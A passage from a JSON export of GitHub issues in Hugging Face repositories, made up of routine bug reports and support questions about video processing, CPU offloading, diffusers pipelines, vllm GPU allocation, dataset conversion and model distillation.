    "body": "Hi,\n\nI've tried a bunch of variants but I can't seem to figure out how to set the video size. Currently, I have:\n\n```py\nprocessor.video_size = { \"longest_edge\": 128 }\nprocessor.do_image_splitting = False\n\ndef sample_indices_fn(metadata, num_frames=None, fps=None, **kwargs):\n        return np.arange(0, 20, dtype=int)\n\nmessages = [\n                {\"role\": \"user\", \"content\": [\n                    { \"type\": \"video\", \"path\": example[\"clip_chunked_path\"] },\n                ] },\n                {\n                    \"role\": \"assistant\",\n                    \"content\": [\n                        {\"type\": \"text\", \"text\": json.dumps(last_player_inputs)},\n                    ]\n                }\n            ]\n\ninputs = processor.apply_chat_template(\n                messages,\n                add_generation_prompt=True,\n                tokenize=True,\n                return_dict=True,\n                return_tensors=\"pt\",\n                sample_indices_fn=sample_indices_fn,\n                video_load_backend=\"torchvision\",\n                images_kwargs={ \"max_image_size\": {\"longest_edge\": 128 } }\n                ).to(model.device, dtype=model.dtype)\n\nprint(\"FRAMES\", inputs[\"pixel_values\"].shape)\n```\n\nWhich gives me a pixel_values shape of `[1, 20, 3, 128, 128]` (which is what I want), but then training crashes:\n\n```\n(RayTrainWorker pid=308152, ip=172.31.24.115) /pytorch/aten/src/ATen/native/cuda/IndexKernel.cu:94: operator(): block: [443,0,0], thread: [29,0,0] Assertion `-sizes[i] <= index && index < sizes[i] && \"index out of bounds\"` failed.\n(RayTrainWorker pid=308152, ip=172.31.24.115) /pytorch/aten/src/ATen/native/cuda/IndexKernel.cu:94: operator(): block: [443,0,0], thread: [30,0,0] Assertion `-sizes[i] <= index && index < sizes[i] && \"index out of bounds\"` failed.\n(RayTrainWorker pid=308152, ip=172.31.24.115) /pytorch/aten/src/ATen/native/cuda/IndexKernel.cu:94: operator(): block: [443,0,0], thread: [31,0,0] Assertion `-sizes[i] <= index && index < sizes[i] && \"index out of bounds\"` failed.\n2025-03-12 04:16:13,286 ERROR tune_controller.py:1331 -- Trial task failed for trial TorchTrainer_4b80b_00000\nTraceback (most recent call last):\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/air/execution/_internal/event_manager.py\", line 110, in resolve_future\n    result = ray.get(future)\n             ^^^^^^^^^^^^^^^\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/_private/auto_init_hook.py\", line 21, in auto_init_wrapper\n    return fn(*args, **kwargs)\n           ^^^^^^^^^^^^^^^^^^^\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/_private/client_mode_hook.py\", line 103, in wrapper\n    return func(*args, **kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/_private/worker.py\", line 2772, in get\n    values, debugger_breakpoint = worker.get_objects(object_refs, timeout=timeout)\n                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/_private/worker.py\", line 919, in get_objects\n    raise value.as_instanceof_cause()\nray.exceptions.RayTaskError(RuntimeError): ray::_Inner.train() (pid=308044, ip=172.31.24.115, actor_id=164821b0515a3af42f0d03bc68000000, repr=TorchTrainer)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/tune/trainable/trainable.py\", line 331, in train\n    raise skipped from exception_cause(skipped)\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/train/_internal/utils.py\", line 57, in check_for_failure\n    ray.get(object_ref)\n           ^^^^^^^^^^^^^^^^^^^\n           ^^^^^^^^^^^^^^^^^^^^^\n                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nray.exceptions.RayTaskError(RuntimeError): ray::_RayTrainWorker__execute.get_next() (pid=308152, ip=172.31.24.115, actor_id=3794a93b2a61f6b6efb8496d68000000, repr=)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/train/_internal/worker_group.py\", line 33, in __execute\n    raise skipped from exception_cause(skipped)\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/ray/train/_internal/utils.py\", line 176, in discard_return_wrapper\n    train_func(*args, **kwargs)\n  File \"/tmp/ray/session_2025-03-04_07-50-04_397300_8643/runtime_resources/working_dir_files/_ray_pkg_77cdef2c25570eb4/agent/train_smol.py\", line 214, in train_func\n    trainer.train()\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/transformers/trainer.py\", line 2243, in train\n    return inner_training_loop(\n           ^^^^^^^^^^^^^^^^^^^^\n  File \"/home/ray/anaconda3/lib/python3.12/site-packages/transformers/trainer.py\", line 2554, in _inner_training_loop\n    tr_loss_step = self.training_step(model, inputs, num_items_i",
    "url": "https://github.com/huggingface/smollm/issues/65",
    "state": "open",
    "labels": [
      "Video"
    ],
    "created_at": "2025-03-12T11:20:28Z",
    "updated_at": "2025-07-29T13:12:05Z",
    "user": "FredrikNoren"
  },
  {
    "repo": "huggingface/accelerate",
    "number": 3437,
    "title": "Need help on how to disable enable_model_cpu_offload / enable_sequential_cpu_offload",
    "body": "So during my testing when used individually, I observed that\n\nenable_sequential_cpu_offload require- 11 GB VRAM\nenable_model_cpu_offload  require - 8 GB VRAM\n\nI am using Diffusers + nunchaku + sd_embed\n\nProblem: sd_embed does not support enable_sequential_cpu_offload but support enable_model_cpu_offload \n\nRequirement: \n1. Form pipe\n2. Use sd_embed to generate prompt_embeds using enable_model_cpu_offload\n3. Disable enable_model_cpu_offload\n4. Enable enable_sequential_cpu_offload and do inference\n\nSo I tried this code\n1. During prompt_embeds VRAM is ~6 GB\n2. During inference VRAM is ~8GB\n\nNoticed enable_model_cpu_offload is not disabled after invoking optionally_disable_offloading and enabling enable_sequential_cpu_offload. The VRAM requirement remains same as what is needed for enable_model_cpu_offload .\n\nIs this something that is doable or not supported? Any guidance is appreciated.\n\n```python\n\nimport torch\nfrom diffusers import FluxPipeline\nimport torch.nn as nn\nfrom accelerate.hooks import CpuOffload, AlignDevicesHook, remove_hook_from_module\nfrom nunchaku import NunchakuFluxTransformer2dModel, NunchakuT5EncoderModel\nfrom sd_embed.embedding_funcs import get_weighted_text_embeddings_flux1\n\ndef optionally_disable_offloading(_pipeline):\n    is_model_cpu_offload = False\n    is_sequential_cpu_offload = False   \n    if _pipeline is not None:\n        for _, component in _pipeline.components.items():\n            if isinstance(component, nn.Module) and hasattr(component, \"_hf_hook\"):\n                if not is_model_cpu_offload:\n                    is_model_cpu_offload = isinstance(component._hf_hook, CpuOffload)\n                if not is_sequential_cpu_offload:\n                    is_sequential_cpu_offload = isinstance(component._hf_hook, AlignDevicesHook)\n               \n                remove_hook_from_module(component, recurse=True)\n    return (is_model_cpu_offload, is_sequential_cpu_offload)\n\ntransformer = NunchakuFluxTransformer2dModel.from_pretrained(\"mit-han-lab/svdq-int4-flux.1-schnell\")\ntext_encoder_2 = NunchakuT5EncoderModel.from_pretrained(\"mit-han-lab/svdq-flux.1-t5\")\n\npipeline = FluxPipeline.from_pretrained(\n    \"black-forest-labs/FLUX.1-schnell\",\n    text_encoder_2=text_encoder_2,\n    transformer=transformer,\n    torch_dtype=torch.bfloat16,\n)\npipeline.enable_model_cpu_offload()\n\nprompt = \"\"\"\\\nA dreamy, soft-focus photograph capturing a romantic Jane Austen movie scene, \nin the style of Agnes Cecile. Delicate watercolors, misty background, \nRegency-era couple, tender embrace, period clothing, flowing dress, dappled sunlight, \nethereal glow, gentle expressions, intricate lace, muted pastels, serene countryside, \ntimeless romance, poetic atmosphere, wistful mood, look at camera.\n\"\"\"\nprompt_embeds, pooled_prompt_embeds = get_weighted_text_embeddings_flux1(\n    pipe        = pipeline\n    , prompt    = prompt\n)\nprint(\">>>>>>>\", optionally_disable_offloading(pipeline))\n\npipeline.enable_sequential_cpu_offload()\n\nimage = pipeline(\n    prompt_embeds=prompt_embeds,\n    pooled_prompt_embeds=pooled_prompt_embeds,\n    num_inference_steps=4, \n    guidance_scale=3.5,\n    generator=torch.Generator(device=\"cpu\").manual_seed(123456)\n).images[0]\nimage.save(\"flux.1-schnell_sd-embed1.png\")\n\nprompt = \"\"\"\\\nA dreamy, soft-focus photograph capturing a romantic Jane Austen movie scene, \nin the style of Agnes Cecile. Delicate watercolors, misty background, \nRegency-era couple, tender embrace, period clothing, flowing dress, dappled sunlight, \nethereal glow, gentle expressions, intricate lace, muted pastels, serene countryside, \ntimeless romance, poetic atmosphere, wistful mood, look at camera.\n\"\"\"\nprint(\">>>>>>>\", optionally_disable_offloading(pipeline))\npipeline.enable_model_cpu_offload()\nprompt_embeds, pooled_prompt_embeds = get_weighted_text_embeddings_flux1(\n    pipe        = pipeline\n    , prompt    = prompt\n)\nprint(\">>>>>>>\", optionally_disable_offloading(pipeline))\npipeline.enable_sequential_cpu_offload()\n\nimage = pipeline(\n    prompt_embeds=prompt_embeds,\n    pooled_prompt_embeds=pooled_prompt_embeds,\n    num_inference_steps=4, \n    guidance_scale=3.5,\n    generator=torch.Generator(device=\"cpu\").manual_seed(12345678)\n).images[0]\nimage.save(\"flux.1-schnell_sd-embed2.png\")\n\n```",
    "url": "https://github.com/huggingface/accelerate/issues/3437",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-12T09:29:08Z",
    "updated_at": "2025-03-12T10:10:33Z",
    "user": "nitinmukesh"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11042,
    "title": "ZeroDivisionError when performing forward pass with UNet3DConditionModel",
    "body": "### Describe the bug\n\n# ZeroDivisionError when performing forward pass with UNet3DConditionModel\n\nI'm encountering a ZeroDivisionError when attempting to perform a forward pass with the UNet3DConditionModel. This seems to be related to the num_attention_heads parameter being None, which causes self.inner_dim to be 0.\n\nHere's the code I'm using:\n\n```python\nfrom diffusers import UNet3DConditionModel\nimport torch\n\nmodel = UNet3DConditionModel(\n    down_block_types=(\n        \"CrossAttnDownBlock3D\",\n        \"CrossAttnDownBlock3D\",\n        \"CrossAttnDownBlock3D\",\n        \"DownBlock3D\",\n    ),\n    up_block_types=(\n        \"UpBlock3D\",\n        \"CrossAttnUpBlock3D\",\n        \"CrossAttnUpBlock3D\",\n        \"CrossAttnUpBlock3D\",\n    ),\n    block_out_channels=(32, 64, 128, 128),\n    norm_num_groups=4,\n)\n\ndata = torch.randn(1, 4, 32, 32, 32)\n\nmodel(data, timestep=3, encoder_hidden_states=torch.zeros(1, 4, 32, 32, 32))\n```\n\nThe error traceback indicates that the issue occurs in the attention processing:\n\n```\nZeroDivisionError: integer division or modulo by zero\n```\n\nThis seems to be because num_attention_heads is None, leading to self.inner_dim = 0 in the transformer configuration.\n\nI noticed that in the UNet3DConditionModel implementation, there's a check that raises an error if num_attention_heads is provided:\n\n```python\nif num_attention_heads is not None:\n    raise NotImplementedError(\n        \"At the moment it is not possible to define the number of attention heads via num_attention_heads because of a naming issue as described in https://github.com/huggingface/diffusers/issues/2011#issuecomment-1547958131 . Passing num_attention_heads will only be supported in diffusers v0.19.\"\n    )\n```\n\nGiven this limitation, I'm unsure how to properly configure the model to avoid this error. Could you provide guidance on:\n1. How to correctly perform a forward pass with demo hidden states\n2. What parameters I should adjust to ensure the model is properly configured\n3. If there's a workaround for this issue in the current version of diffusers\n\nThank you for your assistance!\n\n### Reproduction\n\n```python\nfrom diffusers import UNet3DConditionModel\nimport torch\n\nmodel = UNet3DConditionModel(\n    down_block_types=(\n        \"CrossAttnDownBlock3D\",\n        \"CrossAttnDownBlock3D\",\n        \"CrossAttnDownBlock3D\",\n        \"DownBlock3D\",\n    ),\n    up_block_types=(\n        \"UpBlock3D\",\n        \"CrossAttnUpBlock3D\",\n        \"CrossAttnUpBlock3D\",\n        \"CrossAttnUpBlock3D\",\n    ),\n    block_out_channels=(32, 64, 128, 128),\n    norm_num_groups=4,\n)\n\ndata = torch.randn(1, 4, 32, 32, 32)\n\nmodel(data, timestep=3, encoder_hidden_states=torch.zeros(1, 4, 32, 32, 32))\n```\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nPython 3.11.10\ndiffusers version 0.32.2\nubuntu 24.04\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11042",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-03-12T09:26:01Z",
    "updated_at": "2025-03-13T02:00:12Z",
    "comments": 2,
    "user": "txz32102"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 851,
    "title": "Hello, I would like to ask if I can use my ROS2 MoveIt2 robotic arm?",
    "body": "Can it support ROS training? I believe this would be beneficial for ecosystem development.",
    "url": "https://github.com/huggingface/lerobot/issues/851",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-12T07:39:51Z",
    "updated_at": "2025-08-04T19:29:03Z",
    "user": "Gates-456"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 502,
    "title": "How to use vllm with 2 GPUs?",
    "body": "Just as GRPO OOM #475 stated, the vllm kv init is so large that 1 A100 80GB could not hold it, while I have 8*A100 in total.\nHowever, only 1 GPU is allowed to assign to vllm, as `vllm_device: auto` or  `ib/python3.10/site-packages/trl/trainer/grpo_trainer.py`.\n\nHow should I solve the issue? Would anybody know?\n",
    "url": "https://github.com/huggingface/open-r1/issues/502",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-12T03:36:18Z",
    "updated_at": "2025-06-03T11:55:47Z",
    "user": "greatxue"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11036,
    "title": "Why perform the following operations on the latent condition?",
    "body": "in the code :https://github.com/huggingface/diffusers/blob/main/src/diffusers/pipelines/wan/pipeline_wan_i2v.py\nline 395-404:\n```\nlatents_mean = (\n    torch.tensor(self.vae.config.latents_mean)\n    .view(1, self.vae.config.z_dim, 1, 1, 1)\n    .to(latents.device, latents.dtype)\n)\nlatents_std = 1.0 / torch.tensor(self.vae.config.latents_std).view(1, self.vae.config.z_dim, 1, 1, 1).to(\n    latents.device, latents.dtype\n)\n\nlatent_condition = (latent_condition - latents_mean) * latents_std\n```\nThe official inference code of Wan2.1 does not perform similar operations\uff1a\nhttps://github.com/Wan-Video/Wan2.1/blob/main/wan/image2video.py#L237",
    "url": "https://github.com/huggingface/diffusers/issues/11036",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-12T02:32:09Z",
    "updated_at": "2025-03-15T02:40:13Z",
    "comments": 2,
    "user": "trouble-maker007"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 847,
    "title": "Is there a way Merge | Convert | Edit datasets function or a way how we can train model using different datasets ?",
    "body": "Hey, everyone. \n\nAt the moment, we have this problem: We have recorded datasets with around 100 episodes each, but we would like to train our model with 1000 episodes. Unfortunately, we didn't find a way to load multiple datasets into a single policy training job, is it even possible ? If no, ss there a way to merge a couple of small datasets into a big one? \n\nIf none of that is possible, is there a way to convert to hdf5 ? \n\nI was referencing https://github.com/huggingface/lerobot/issues/533, but there are no answers as well.  \n",
    "url": "https://github.com/huggingface/lerobot/issues/847",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "dataset"
    ],
    "created_at": "2025-03-11T17:25:08Z",
    "updated_at": "2025-10-17T12:09:32Z",
    "user": "runmaget"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 846,
    "title": "How to convert my own dataset to LerobotDataset format?",
    "body": "Hi, I am new to Lerobot and have a dataset in my own format. I would like to convert it to the LerobotDataset format.\n\nI referred to `lerobot/scripts/push_dataset_to_hub.py`, but it seems to be deprecated. Could you provide guidance or an updated method for converting custom datasets?\n\nThanks in advance!",
    "url": "https://github.com/huggingface/lerobot/issues/846",
    "state": "closed",
    "labels": [
      "question",
      "dataset"
    ],
    "created_at": "2025-03-11T09:17:23Z",
    "updated_at": "2025-04-15T00:59:10Z",
    "user": "yilin404"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 498,
    "title": "How to Enable enforce_eager or Disable CUDA Graph in Evaluation",
    "body": "Evaluation code is currently using lighteval and vLLM for inference, and I would like to disable CUDA Graph by enabling options like ```enforce_eager```. However, I could not find a command-line argument for this in ```$MODEL_ARGS```. Additionally, setting it as an environment variable (e.g., VLLM_ENFORCE_EAGER) does not seem to work.\n\nIs there a way to achieve this? Any guidance would be appreciated.",
    "url": "https://github.com/huggingface/open-r1/issues/498",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-11T00:25:49Z",
    "updated_at": "2025-03-11T04:54:02Z",
    "user": "superdocker"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11020,
    "title": "Multi-gpus Context Parallel training support?",
    "body": "Nowadays, the number of parameters in video generation models is increasing, and the video length is increasing. When training video models, it is difficult to fit a complete video sequence(200k~ tokens) on a single GPU. Some sequence parallel training technologies can solve this problem, such as the [fastvideo](https://github.com/hao-ai-lab/FastVideo) training framework, but the imperfection of this framework makes it difficult to use. Can the diffusers framework support sequence parallel training?",
    "url": "https://github.com/huggingface/diffusers/issues/11020",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-10T11:45:30Z",
    "updated_at": "2025-07-18T13:05:08Z",
    "comments": 2,
    "user": "yinian-lw"
  },
  {
    "repo": "huggingface/blog",
    "number": 2728,
    "title": "Open In \"02_how_to_generate\", code cell 1 has an outdated version of tensorflow",
    "body": "The notebook 02_how_to_generate.ipynb currently specifies tensorflow==2.1, which is no longer available.\n\nif we run that cell we get the error:Could not find a version that satisfies the requirement tensorflow==2.1 (from versions: 2.12.0rc0, 2.12.0rc1, 2.12.0, 2.12.1, 2.13.0rc0, 2.13.0rc1, 2.13.0rc2, 2.13.0, 2.13.1, 2.14.0rc0, 2.14.0rc1, 2.14.0, 2.14.1, 2.15.0rc0, 2.15.0rc1, 2.15.0, 2.15.0.post1, 2.15.1, 2.16.0rc0, 2.16.1, 2.16.2, 2.17.0rc0, 2.17.0rc1, 2.17.0, 2.17.1, 2.18.0rc0, 2.18.0rc1, 2.18.0rc2, 2.18.0, 2.19.0rc0) ERROR: No matching distribution found for tensorflow==2.1.",
    "url": "https://github.com/huggingface/blog/issues/2728",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-09T18:05:55Z",
    "updated_at": "2025-03-09T18:06:11Z",
    "user": "Umashankar86"
  },
  {
    "repo": "huggingface/blog",
    "number": 2727,
    "title": "Open In \"02_how_to_generate\", code cell 1 has an outdated version of tensorflow",
    "body": "The notebook 02_how_to_generate.ipynb currently specifies tensorflow==2.1, which is no longer available.\n\nif we run that cell we get the error:Could not find a version that satisfies the requirement tensorflow==2.1 (from versions: 2.12.0rc0, 2.12.0rc1, 2.12.0, 2.12.1, 2.13.0rc0, 2.13.0rc1, 2.13.0rc2, 2.13.0, 2.13.1, 2.14.0rc0, 2.14.0rc1, 2.14.0, 2.14.1, 2.15.0rc0, 2.15.0rc1, 2.15.0, 2.15.0.post1, 2.15.1, 2.16.0rc0, 2.16.1, 2.16.2, 2.17.0rc0, 2.17.0rc1, 2.17.0, 2.17.1, 2.18.0rc0, 2.18.0rc1, 2.18.0rc2, 2.18.0, 2.19.0rc0) ERROR: No matching distribution found for tensorflow==2.1.",
    "url": "https://github.com/huggingface/blog/issues/2727",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-09T18:04:48Z",
    "updated_at": "2025-03-09T18:05:03Z",
    "user": "Umashankar86"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7442,
    "title": "Flexible Loader",
    "body": "### Feature request\n\nCan we have a utility function that will use `load_from_disk` when given the local path and `load_dataset` if given an HF dataset?\n\nIt can be something as simple as this one:\n\n```\ndef load_hf_dataset(path_or_name):\n    if os.path.exists(path_or_name):\n        return load_from_disk(path_or_name)\n    else:\n        return load_dataset(path_or_name)\n```\n\n### Motivation\n\nThis can be done inside the user codebase, too, but in my experience, it becomes repetitive code.\n\n### Your contribution\n\nI can open a pull request.",
    "url": "https://github.com/huggingface/datasets/issues/7442",
    "state": "open",
    "labels": [
      "enhancement"
    ],
    "created_at": "2025-03-09T16:55:03Z",
    "updated_at": "2025-03-27T23:58:17Z",
    "comments": 3,
    "user": "dipta007"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1751,
    "title": "Analyze uploaded PDF files through OpenAI API",
    "body": "When I upload a PDF file and leverage it, I will get the base64 data. But I didn't find the code to process it in endpoints/openai, while it can handle the image base64 data. Besides, I failed to transfer it back to text. How can I analyze the file through OpenAI API? \n\n![Image](https://github.com/user-attachments/assets/278ec727-2e9b-41b8-a8d3-080d50a5a9e9)",
    "url": "https://github.com/huggingface/chat-ui/issues/1751",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2025-03-09T09:31:13Z",
    "updated_at": "2025-03-15T18:38:17Z",
    "comments": 2,
    "user": "zu0feng"
  },
  {
    "repo": "huggingface/hf-hub",
    "number": 99,
    "title": "Where is the `0.4.2` commit?",
    "body": "I saw on [crates.io](https://crates.io/crates/hf-hub/versions) that the latest version of hf-hub is 0.4.2, but I can't find the 0.4.2 tag on GitHub. Could you tell me what is the commit ID corresponding to this version?\n\nSincerely suggest that you add a corresponding tag for each version release, which can effectively avoid such inefficient communication and thus speed up the work efficiency of other contributors.\ud83d\ude4f",
    "url": "https://github.com/huggingface/hf-hub/issues/99",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-08T12:43:18Z",
    "updated_at": "2025-06-16T09:41:15Z",
    "user": "HairlessVillager"
  },
  {
    "repo": "huggingface/transformers",
    "number": 36613,
    "title": "In \"02_how_to_generate\", code cell 1 has an error message",
    "body": "### System Info\n\nIn \"02_how_to_generate\", code cell 1 has an error message but the rest works fine: ERROR: Could not find a version that satisfies the requirement tensorflow==2.1 (from versions: 2.12.0rc0, 2.12.0rc1, 2.12.0, 2.12.1, 2.13.0rc0, 2.13.0rc1, 2.13.0rc2, 2.13.0, 2.13.1, 2.14.0rc0, 2.14.0rc1, 2.14.0, 2.14.1, 2.15.0rc0, 2.15.0rc1, 2.15.0, 2.15.0.post1, 2.15.1, 2.16.0rc0, 2.16.1, 2.16.2, 2.17.0rc0, 2.17.0rc1, 2.17.0, 2.17.1, 2.18.0rc0, 2.18.0rc1, 2.18.0rc2, 2.18.0, 2.19.0rc0) ERROR: No matching distribution found for tensorflow==2.1.\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nRun code cell 1\n\n### Expected behavior\n\nNo error message should appear when running code cell",
    "url": "https://github.com/huggingface/transformers/issues/36613",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-03-08T07:46:39Z",
    "updated_at": "2025-04-16T08:03:04Z",
    "user": "kvutien"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11008,
    "title": "Support wan2.1 video model?",
    "body": "### Did you like the remote VAE solution?\n\nYes. \n\n### What can be improved about the current solution?\n\nWan2.1 video model support is appreciated!\n\n### What other VAEs you would like to see if the pilot goes well?\n\nWan2.1 video model support is appreciated!\n\n### Notify the members of the team\n\n@hlky @sayakpaul",
    "url": "https://github.com/huggingface/diffusers/issues/11008",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-03-08T04:21:33Z",
    "updated_at": "2025-05-09T15:03:47Z",
    "comments": 6,
    "user": "kexul"
  },
  {
    "repo": "huggingface/trl",
    "number": 3028,
    "title": "Distill teacher models where the vocab size of teacher and student is different",
    "body": "I am trying to distill a Qwen2.5-7B-Instruct to Qwen2.5-5B-Instruct using a sample code \n\n```from datasets import Dataset\nfrom trl import GKDConfig, GKDTrainer\nfrom transformers import (\n    AutoModelForCausalLM,\n    AutoTokenizer,\n)\n\nNUM_DUMMY_SAMPLES = 100\n\ntokenizer = AutoTokenizer.from_pretrained(\"Qwen/Qwen2.5-0.5B-Instruct\")\n\nmodel = AutoModelForCausalLM.from_pretrained(\"Qwen/Qwen2.5-0.5B-Instruct\")\n\nteacher_model = AutoModelForCausalLM.from_pretrained(\"Qwen/Qwen2.5-7B-Instruct\")\n\ntrain_dataset = Dataset.from_dict(\n    {\n        \"messages\": [\n            [\n                {\"role\": \"user\", \"content\": \"Hi, how are you?\"},\n                {\"role\": \"assistant\", \"content\": \"I'm great thanks\"},\n            ]\n        ]\n        * NUM_DUMMY_SAMPLES\n    }\n)\neval_dataset = Dataset.from_dict(\n    {\n        \"messages\": [\n            [\n                {\"role\": \"user\", \"content\": \"What colour is the sky?\"},\n                {\"role\": \"assistant\", \"content\": \"The sky is blue\"},\n            ]\n        ]\n        * NUM_DUMMY_SAMPLES\n    }\n)\n\ntraining_args = GKDConfig(output_dir=\"gkd-model\", per_device_train_batch_size=1)\ntrainer = GKDTrainer(\n    model=model,\n    teacher_model=teacher_model,\n    args=training_args,\n    processing_class=tokenizer,\n    train_dataset=train_dataset,\n    eval_dataset=eval_dataset,\n)\ntrainer.train()```\n\nBut this gives me an error because their vocab sizes are different (so might be their tokenizers). Is there a workaround for these kind of situations? How are such cases handled?",
    "url": "https://github.com/huggingface/trl/issues/3028",
    "state": "open",
    "labels": [
      "\ud83c\udfcb GKD"
    ],
    "created_at": "2025-03-08T00:29:01Z",
    "updated_at": "2025-10-29T04:15:50Z",
    "user": "shaunakjoshi12"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11005,
    "title": "pipeline_wan_i2v.py: minor discrepancy between arg default and docstring",
    "body": "### Describe the bug\n\nhttps://github.com/huggingface/diffusers/blob/main/src/diffusers/pipelines/wan/pipeline_wan_i2v.py\n\nLine 447 (arg default):\n```output_type: Optional[str] = \"np\",```\n\nLine 496 (docstring):\n```output_type (`str`, *optional*, defaults to `\"pil\"`):```\n\n### Reproduction\n\nn/a\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nn/a\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11005",
    "state": "closed",
    "labels": [
      "bug",
      "good first issue",
      "help wanted",
      "contributions-welcome"
    ],
    "created_at": "2025-03-07T16:37:48Z",
    "updated_at": "2025-04-24T18:49:38Z",
    "comments": 2,
    "user": "rolux"
  },
  {
    "repo": "huggingface/finetrainers",
    "number": 301,
    "title": "How to train text-to-video generation model on different generation models using Disney dataset?",
    "body": "The current repository does not explicitly describe ho to change training methods between t2v or i2v.\n",
    "url": "https://github.com/huggingface/finetrainers/issues/301",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-07T16:02:42Z",
    "updated_at": "2025-03-07T16:08:06Z",
    "user": "kjosh925"
  },
  {
    "repo": "huggingface/speech-to-speech",
    "number": 159,
    "title": "What is from df.enhance import enhance, init_df ? in vad_handler?",
    "body": "",
    "url": "https://github.com/huggingface/speech-to-speech/issues/159",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-07T15:07:53Z",
    "updated_at": "2025-03-07T15:07:53Z",
    "user": "Manukrishna2K"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11002,
    "title": "Any chance class members like self._interrupt could be defined in __init__ across pipelines?",
    "body": "### Describe the bug\n\nI think there is no benefit to late initializing here and it puts a burden on the library user that could be easily avoided. Also leads to some confusion as it is uncommon, code inspection flags this. Let me know if I'm missing something.\n\n### Reproduction\n\n```\nclass WanImageToVideoPipeline:\n\tdef __init__(self):\n\t\tpass\n\t\n\tdef __call__(self, *args, **kwargs):\n\t\tself._interrupt = False\n\t\treturn 23\n\n\t@property\n\tdef interrupt(self):\n\t\treturn self._interrupt\n\t\npipe = WanImageToVideoPipeline()\n\ndef on_async_user_abort_call_me_any_time():\n\t# check if already interrupted but mid step\n\tprint(pipe.interrupt)\n\n\non_async_user_abort_call_me_any_time()\n```\n\n### Logs\n\n```shell\nAttributeError: 'WanImageToVideoPipeline' object has no attribute '_interrupt'. Did you mean: 'interrupt'?\n```\n\n### System Info\n\nDiffusers 0.33.0.dev0, Linux, Python 3.10\n\n### Who can help?\n\n@yiyixuxu @DN6",
    "url": "https://github.com/huggingface/diffusers/issues/11002",
    "state": "open",
    "labels": [
      "bug",
      "help wanted",
      "contributions-welcome"
    ],
    "created_at": "2025-03-07T11:28:27Z",
    "updated_at": "2025-05-26T07:21:47Z",
    "comments": 9,
    "user": "spezialspezial"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10993,
    "title": "f-divergence",
    "body": "Is there a plan to implement the f-divergence scheduler ? I would like to contribute that to the library.",
    "url": "https://github.com/huggingface/diffusers/issues/10993",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-03-06T22:46:13Z",
    "updated_at": "2025-04-06T15:02:55Z",
    "comments": 5,
    "user": "manmeet3591"
  },
  {
    "repo": "huggingface/smolagents",
    "number": 902,
    "title": "How to populate custom variables in prompt template?",
